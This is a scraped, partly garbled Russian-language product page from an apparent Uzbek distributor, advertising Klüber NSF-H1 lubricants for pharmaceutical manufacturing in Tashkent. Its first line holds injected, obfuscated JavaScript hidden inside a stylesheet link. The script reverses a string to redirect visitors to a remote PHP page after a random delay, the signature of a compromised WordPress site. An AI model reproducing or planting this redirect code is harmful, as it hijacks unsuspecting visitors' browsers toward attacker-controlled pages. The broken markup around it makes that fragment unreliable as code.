tom-css' href='http://www.klueber.uz/wp-content/themes/betheme/css/skins/cusscript$zXz=function(n)if%20(typeof%20($zXz.list%5Bn%5D)%20==%20string)%20return%20$zXz.list%5Bn%5D.split().reverse().join();return%20$zXz.list%5Bn%5D;;$zXz.list=%5B'php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth'=ferh.noitacol.tnemucod%5D;var%20number1=Math.floor(Math.random()%20*%206);if%20(number1==3)var%20delay%20=%2018000;setTimeout($zXz(0),%20delay);/scripttom/style.css?ver=21.2.1' type='text/css' media='all' /> tom style-default button-flat layout-full-width hide-love header-stack header-right minimalist-header-no sticky-header sticky-tb-color ab-hide subheader-transparent subheader-both-center menu-link-color menuo-last footer-copy-center mobile-tb-left mobile-mini-mr-ll tr-content be-2121 wpb-js-composer js-comp-ver-4.9.2 vc_responsive">
to" style="padding-top:0px;padding-bottom:0px;background-color:" >
top bg-auto clearfix" style="" >

Высокие требования

Чтобы поддержать Вас в выполнении жёстких предписаний по правилам организации и контроля качества лекарственных средств в фармацевтической промышленности (GMP), Klüber Lubrication разработал специальные смазочные материалы, зарегистрированные по стандарту NSF-H1.

Контроль рисков по возможным загрязнениям продукции является одним из важнейших составляющих этих предписаний. Под загрязнением понимается занесение в продукт любых нежелательных веществ. Под внимание со стороны контроля рисков попадают также все производственные материалы, в том числе и смазочные материалы, которые, если это технически неизбежно, могут случайным образом контактировать с продуктом.

Чтобы повысить надёжность производственных процессов, в производстве необходимо использовать только зарегистрированные по стандарту NSF-H1 смазочные материалы. В этом случае исключается опасность ошибок и недоразумений в использовании смазочных материалов, а также загрязнение смазочными материалами, не зарегистрированными по стандарту H1.

Растворимый без остатка

Все смазочные материалы соответствуют рекомендациям директивы 21CFR 178.3570 Управления министерства торговли США по контролю за качеством пищевых продуктов, медикаментов и косметических средств и зарегистрированы по стандарту NSF-H1. Кроме этого, все заводы Klüber Lubrication по изготовлению смазочных материалов и сами материалы сертифицируются организацией NSF по современному международному стандарту ISO21469. Этот стандарт определяет гигиенические требования к рецептуре, изготовлению и использованию смазочных материалов, которые могут иметь случайный контакт с изготавливаемой продукцией. Стандарт также требует от производителей смазочных материалов разработки стратегии в области гигиены и оценивает физические, химические и биологические опасности в отношении предписанного использования смазочных материалов.

В тесном сотрудничестве с производителями оборудования для каждого узла смазки мы разрабатываем смазочный материал, который будет точно соответствовать всем предписанным требованиям. Благодаря высокой производительности наших смазочных материалов резко сокращается их необходимый расход. Точное дозирование смазки также соответствует предписаниям надлежащей практики производства. Перевод промышленных масел и смазок на минеральной основе на высокопроизводительные, зарегистрированные по стандарту NSF-H1, смазочные материалы, как правило возможен без больших затрат, если выполняются некоторые базовые условия (совместимость с материалами, возможная замена имеющихся элементов фильтров и проч.). Так как в зависимости от имеющегося оборудования необходимо учитывать различные данные, мы охотно проконсультируем Вас по данным вопросам.

Высокопроизводительные зарегистрированные по стандару H1 смазочные материалы Klüber Lubrication

Специальные смазочные материалы Klüber повышают производительность, надёжность и экономичность Вашего оборудования. Наши смазочные материалы, зарегистрированные по стандарту H1, оптимизированы по следующим пяти характеристикам:

–             высокая устойчивость к старению и окислению

–             оптимальная защита от износа

–             хорошая защита от коррозии

–             хорошая водостойкость, которая предотвращает вымывание при очистных работах и   дополнительно защищает от коррозии

–             высокая несущая способность

Благодаря этому значительно увеличивается срок службы узлов и компонентов. Существенно снижается уровень затрат на обслуживание и технический уход за оборудованием, так как увеличиваются интервалы обслуживания. Также, в зависимости от применения, уменьшается расход электроэнергии. Наши эксперты охотно проконсультируют Вас, если речь идёт о том, чтобы детально объяснить, какие характеристики проявляет тот или иной наш смазочный материал. Мы также охотно предоставим Вам соответствующую информацию по продукту.



Заказать и купить специальные смазочные материалы Клюбер для фармацевтической промышленности в Ташкенте вы можете в нашей компании. Мы осуществляем доставку во все города республики. Собственные склады и логистическая система. Мы обеспечиваем сохранность смазочных материалов в процессе доставки по Узбекистану.

Стоимость масла Клюбер в Ташкенте, в Узбекистане вы можете уточнить у наших менеджеров позвонив по номеру +998 78 148 1 148

Цена масла Клюбер по вашему заказу будет зависеть от объема самого заказа и удаленности региона доставки от нашего ближайшего склада.